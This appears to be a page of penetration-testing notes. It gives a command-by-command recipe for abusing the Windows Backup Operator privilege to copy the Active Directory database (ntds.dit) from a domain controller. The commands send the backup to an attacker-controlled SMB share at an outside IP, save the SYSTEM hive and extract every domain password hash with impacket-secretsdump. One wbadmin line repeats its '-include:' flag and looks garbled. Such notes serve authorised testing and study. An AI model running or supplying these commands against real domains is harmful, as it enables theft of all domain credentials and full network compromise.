Backup Operator SeBackupPrivilege dump ntds.dit

Dump NTDS from DC echo y | wbadmin start backup -backuptarget:\\10.10.14.91\share -include:-include:c:\windows\ntds

Create 2gB NTFS partition

dd if=/dev/zero of=ntfs.disk bs=1024M count=2 
losetup -fP ntfs.disk
mkfs.ntfs /dev/loop0
mount /dev/loop0 /tmp/share

Configure samba ![[Pasted image 20240423153016.png]]

mkdir /tmp/share
chmod 777 /tmp/share
sudo systemctl restart smbd

Backup to samba echo y | wbadmin start backup -backuptarget:\\10.10.14.91\share -include:c:\windows\ntds

Get Version wbadmin get versions

Recover ntds file to dc readable echo y | wbadmin start recovery -version:???? -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:c:\ -notrestoreacl

Get SYSTEM hive cmd /c reg save HKLM\SYSTEM system.hiv

Download both and Extract Hashes impacket-secretsdump -ntds ntds.dit -system system.hiv -history LOCAL

PreviousYou have found an Azure sync sql server and have access NextBypass AMSI